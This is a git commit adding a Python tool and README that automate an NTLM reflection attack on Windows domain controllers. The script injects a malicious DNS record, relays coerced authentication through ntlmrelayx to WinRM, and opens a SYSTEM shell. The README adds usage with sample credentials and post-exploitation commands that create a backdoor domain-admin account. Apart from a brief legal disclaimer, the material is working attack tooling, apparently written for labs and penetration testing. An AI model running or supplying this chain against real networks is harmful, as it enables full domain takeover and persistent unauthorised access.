Added NTLM REFLECTION

author: jaytiwari05 <www.jaytiwari2121@gmail.com> 2025-11-16 20:13:06 +0530
committer: jaytiwari05 <www.jaytiwari2121@gmail.com> 2025-11-16 20:13:06 +0530
commit: b6735359f1c8721ac7fce5302fac11b54acddeed (patch)
tree: fbe5e25e42708cf66d9a25033fba7b17c5d24d4b /auto_ntlm_reflection
parent: b7a852c0e670b91eb2e39e620fe7a9bb423ad644 (diff)
6 files changed, 338 insertions, 0 deletions
diff --git a/auto_ntlm_reflection/01.png b/auto_ntlm_reflection/01.png
new file mode 100644
index 0000000..bbcd099
--- /dev/null
+++ b/auto_ntlm_reflection/01.png
diff --git a/auto_ntlm_reflection/02.png b/auto_ntlm_reflection/02.png
new file mode 100644
index 0000000..16c0cb1
--- /dev/null
+++ b/auto_ntlm_reflection/02.png
diff --git a/auto_ntlm_reflection/03.png b/auto_ntlm_reflection/03.png
new file mode 100644
index 0000000..91677dd
--- /dev/null
+++ b/auto_ntlm_reflection/03.png
diff --git a/auto_ntlm_reflection/04.png b/auto_ntlm_reflection/04.png
new file mode 100644
index 0000000..1623ad7
--- /dev/null
+++ b/auto_ntlm_reflection/04.png
diff --git a/auto_ntlm_reflection/README.md b/auto_ntlm_reflection/README.md
new file mode 100644
index 0000000..9836e5c
--- /dev/null
+++ b/auto_ntlm_reflection/README.md
@@ -0,0 +1,181 @@
+# NTLM Reflection Auto-Exploitation Tool
+
+A powerful automation tool for exploiting NTLM Reflection vulnerabilities to gain Domain Admin privileges on Windows domains.
+
+## 🚀 Features
+
+- **Automated DNS Record Injection** - Adds malicious DNS records for coercion
+- **NTLM Relay Attack** - Relays authentication to WinRM for SYSTEM shell
+- **Coercion Automation** - Uses multiple coercion techniques (DFSCoerce, PetitPotam, etc.)
+- **Background Process Management** - Handles all processes automatically
+- **Shell Detection** - Automatically detects when WinRM shell is ready
+- **Clean Interface** - Provides clear instructions for shell access
+
+## 📋 Prerequisites
+
+### Required Tools
+```bash
+# Install dependencies
+sudo apt update
+sudo apt install python3 python3-pip netcat
+
+# Install required Python packages
+pipx uninstall impacket
+pipx install git+https://github.com/fortra/impacket.git
+
+
+# Install netexec (nxc)
+pipx uninstall NetExec
+pipx install git+https://github.com/Pennyw0rth/NetExec
+```
+
+### Required Access
+- Valid domain user credentials
+- Network access to Domain Controller
+- Ability to create DNS records
+
+## 🛠️ Usage
+
+### Basic Syntax
+```bash
+./auto_ntlm_reflection.py -u 'DOMAIN\\USER' -p 'PASSWORD' -d DOMAIN -dc-name DC_HOSTNAME -ip YOUR_IP -dc-ip DC_IP
+```
+
+### Example
+```bash
+./auto_ntlm_reflection.py -u 'paincorp.local\web_svc' -p 'dksehdgh712!@#' -d paincorp.local -dc-name dc01.paincorp.local -ip 10.10.xx.xx -dc-ip 10.129.xxx.xxx
+```
+
+### Parameters
+- `-u` : Domain user (format: `DOMAIN\\USER`)
+- `-p` : Password for the user
+- `-d` : Domain name
+- `-dc-name` : Domain Controller hostname
+- `-ip` : Your attacking machine IP address
+- `-dc-ip` : Domain Controller IP address
+
+## 🔄 Automated Shell Listener
+
+For automatic connection when the shell is ready, use this while loop:
+
+```bash
+while ! nc 127.0.0.1 11000 2>/dev/null; do sleep 1; done
+```
+
+## 🎯 Proof of Concept
+
+### 1. Verify Shell Access
+```cmd
+whoami
+# Output: nt authority\system
+```
+![Checking](/auto_ntlm_reflection/01.png)
+
+### 2. Retrieve Root Flag
+```cmd
+type C:\Users\Administrator\Desktop\root.txt
+```
+
+### 3. Create Persistence User
+```cmd
+net user pain Password@123 /add
+net group "domain admins" pain /add
+net localgroup administrators pain /add
+net user pain
+```
+![Checking](/auto_ntlm_reflection/02.png)
+
+### 4. Verify Domain Admin Access
+```cmd
+net group "domain admins"
+```
+
+### 5. Establish WinRM Connection (Alternative Access)
+```bash
+python3 /opt/winrmexec/evil_winrmexec.py -ssl -port 5986 paincorp.local/pain:'Password@123'@dc01.paincorp.local
+```
+![Checking](/auto_ntlm_reflection/03.png)
+![Checking](/auto_ntlm_reflection/04.png)
+
+
+
+## 🎥 Attack Flow
+
+1. **DNS Poisoning** - Injects malicious DNS record
+2. **Coercion Trigger** - Forces DC to authenticate to attacker
+3. **NTLM Relay** - Relays authentication to WinRM service
+4. **SYSTEM Shell** - Gains interactive SYSTEM shell on DC
+5. **Persistence** - Creates new domain admin user
+
+## 🛡️ Techniques Used
+
+- **DFSCoerce** - DFS namespace coercion
+- **PetitPotam** - EFS RPC coercion  
+- **NTLM Relay** - Authentication relay to WinRM
+- **DNS Admin Abuse** - DNS record modification
+- **WinRM Exploitation** - WinRM service compromise
+
+## 📊 Expected Output
+
+When successful, you'll see:
+```
+[!] SHELL READY! Run this command in a new terminal:
+[!] nc 127.0.0.1 11000
+[!] Both processes are still running in the background
+```
+
+## 🔧 Troubleshooting
+
+### Common Issues
+
+1. **Port 445 in use**
+   ```bash
+   sudo systemctl stop smbd
+   ```
+
+2. **DNS record already exists**
+   - Tool automatically handles duplicate records
+
+3. **Shell not responding**
+   - Wait 10-30 seconds for WinRM to stabilize
+   - Try pressing Enter multiple times
+   - Start with simple commands like `whoami`
+
+4. **Connection refused**
+   - Ensure ntlmrelayx process is still running
+   - Check if coercion triggered successfully
+
+### Process Management
+```bash
+# Check running processes
+ps aux | grep -E '(ntlmrelayx|nxc)'
+
+# Kill all processes manually
+pkill -f 'ntlmrelayx'
+pkill -f 'nxc smb'
+```
+
+## ⚠️ Legal Disclaimer
+
+This tool is for educational and authorized penetration testing purposes only. The authors are not responsible for any misuse or damage caused by this tool. Always ensure you have proper authorization before testing.
+
+## 📝 Notes
+
+- Requires DNS admin privileges or equivalent
+- Works best when attacker can create DNS records
+- Multiple coercion methods increase success rate
+- WinRM shells may be slow to respond initially
+- Always clean up created users after testing
+
+## 🎯 Success Indicators
+
+- `nt authority\system` in whoami output
+- Ability to read Administrator files
+- Successful creation of domain admin user
+- WinRM access with new credentials
+
+---
+
+**Author**: PaiN05  
+**Tool**: NTLM Reflection Auto-Exploitation  
+**Purpose**: Red Team Operations & Penetration Testing
+\ No newline at end of file
diff --git a/auto_ntlm_reflection/auto_ntlm_reflection.py b/auto_ntlm_reflection/auto_ntlm_reflection.py
new file mode 100644
index 0000000..8160bec
--- /dev/null
+++ b/auto_ntlm_reflection/auto_ntlm_reflection.py
@@ -0,0 +1,157 @@
+#!/usr/bin/env python3
+
+# Code for Automating NTLM_Reflection Attack
+# Author : PaiN05
+# 16-11-2025
+
+import os
+import argparse
+import threading
+import subprocess
+import time
+import signal
+
+listener = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
+shell_detected = False
+
+def run_process(cmd, process_name):
+    """Run a process and monitor for shell string"""
+    global shell_detected
+    
+    process = subprocess.Popen(
+        cmd,
+        shell=True,
+        stdout=subprocess.PIPE,
+        stderr=subprocess.STDOUT,
+        text=True,
+        bufsize=1
+    )
+    
+    print(f"[{process_name}] Started with PID: {process.pid}")
+
+    for line in process.stdout:
+        print(f"[{process_name}] {line}", end="", flush=True)
+        
+        # Check for WinRMS shell string
+        if "Started interactive WinRMS shell via TCP on 127.0.0.1:11000" in line and not shell_detected:
+            shell_detected = True
+            print(f"\n" + "="*60)
+            print(f"[!] SHELL READY! Run this command in a new terminal:")
+            print(f"[!] nc 127.0.0.1 11000")
+            print(f"[!] Both processes are still running in the background")
+            print(f"="*60)
+    
+    return process
+
+def main():
+    global shell_detected
+    
+    parser = argparse.ArgumentParser(
+        description="Automate NTLM relay workflow (DNS → DIG → Relay → Coerce)."
+    )
+
+    # DNS related details
+    parser.add_argument("-u", required=True, help="Domain user (DOMAIN.LOCAL\\user)")
+    parser.add_argument("-p", required=True, help="Password for the user")
+    parser.add_argument("-d", required=True, help="Domain Name (e.g. paincorp.local)")
+    parser.add_argument("-dc-name", required=True, help="DC hostname (e.g. dc01.paincorp.local)")
+    parser.add_argument("-dc-ip", required=True, help="DC hostname (e.g. paincorp.local)")
+    parser.add_argument("-ip", required=True, help="IP address the DNS record should point to")
+
+    args = parser.parse_args()
+
+    # PRINT parsed arguments
+    print("[+] Parsed arguments:")
+    for k, v in vars(args).items():
+        print(f"    {k}: {v}")
+
+    # Checking NTLM Reflection
+    check_ntlm_reflection = (
+        f"nxc smb {args.dc_name} "
+        f"-u {args.u.split('\\')[-1]} -p '{args.p}' "
+        f"-M ntlm_reflection"
+    )
+    #print(f"\n[+] NTLM_Reflection Exist:\n{dns_cmd}\n")
+
+    # DNS add
+    dns_cmd = (
+        f"python3 /opt/krbrelayx/dnstool.py "
+        f"-u '{args.d}\{args.u}' -p '{args.p}' "
+        f"{args.dc_name} -a add -r '{listener}' "
+        f"-d '{args.ip}' -dns-ip {args.dc_ip} --tcp --allow-multiple"
+    )
+    #print(f"\n[+] DNS Command:\n{dns_cmd}\n")
+
+    # DIG check
+    dig_cmd = (
+        f"dig {listener}.{args.d} "
+        f"@{args.dc_name} +tcp +short"
+    )
+    #print(f"[+] DIG Verification:\n{dig_cmd}\n")
+
+    # Relay
+    relay_cmd = (
+        f"ntlmrelayx.py -smb2support -t 'winrms://{args.dc_name}'"
+    )
+    #print(f"[+] Relay Command:\n{relay_cmd}\n")
+
+    # Coerce
+    coerce_cmd = (
+        f"nxc smb {args.dc_name} "
+        f"-u {args.u.split('\\')[-1]} -p '{args.p}' "
+        f"-M coerce_plus -o LISTENER={listener} ALWAYS=true"
+    )
+    #print(f"[+] Coerce Command:\n{coerce_cmd}\n")
+
+    # ---------------------------------------------------------
+    # EXECUTION PHASE - JUST MONITOR AND INFORM USER
+    # ---------------------------------------------------------
+
+    # Checking for NTLM Reflection using nxc
+    print("\n NTLM Reflection Exists")
+    os.system(check_ntlm_reflection)
+
+    # Run DNS and DIG first
+    print("\n[+] Running DNS setup...")
+    os.system(dns_cmd)
+    
+    print("\n[+] Running DIG verification...")
+    os.system(dig_cmd)
+
+    # Start both processes
+    print("\n[+] Starting ntlmrelayx and nxc coerce...")
+    
+    # Start relay in a thread
+    relay_thread = threading.Thread(
+        target=run_process, 
+        args=(relay_cmd, "RELAY"), 
+        daemon=True
+    )
+    relay_thread.start()
+
+    # Wait a bit then start coerce
+    time.sleep(3)
+    
+    # Start coerce in a thread
+    coerce_thread = threading.Thread(
+        target=run_process, 
+        args=(coerce_cmd, "COERCE"), 
+        daemon=True
+    )
+    coerce_thread.start()
+
+    # Wait for shell detection or let processes run
+    print("\n[+] Monitoring for shell... (Press Ctrl+C to stop all processes)")
+    
+    try:
+        # Keep the main thread alive
+        while True:
+            time.sleep(1)
+    except KeyboardInterrupt:
+        print(f"\n[!] Stopping all processes...")
+        os.system("pkill -f 'ntlmrelayx' 2>/dev/null")
+        os.system("pkill -f 'nxc smb' 2>/dev/null")
+        print("[!] All processes stopped.")
+
+if __name__ == "__main__":
+    main()
+\ No newline at end of file
author	jaytiwari05 <www.jaytiwari2121@gmail.com>	2025-11-16 20:13:06 +0530
committer	jaytiwari05 <www.jaytiwari2121@gmail.com>	2025-11-16 20:13:06 +0530
commit	b6735359f1c8721ac7fce5302fac11b54acddeed (patch)
tree	fbe5e25e42708cf66d9a25033fba7b17c5d24d4b /auto_ntlm_reflection
parent	b7a852c0e670b91eb2e39e620fe7a9bb423ad644 (diff)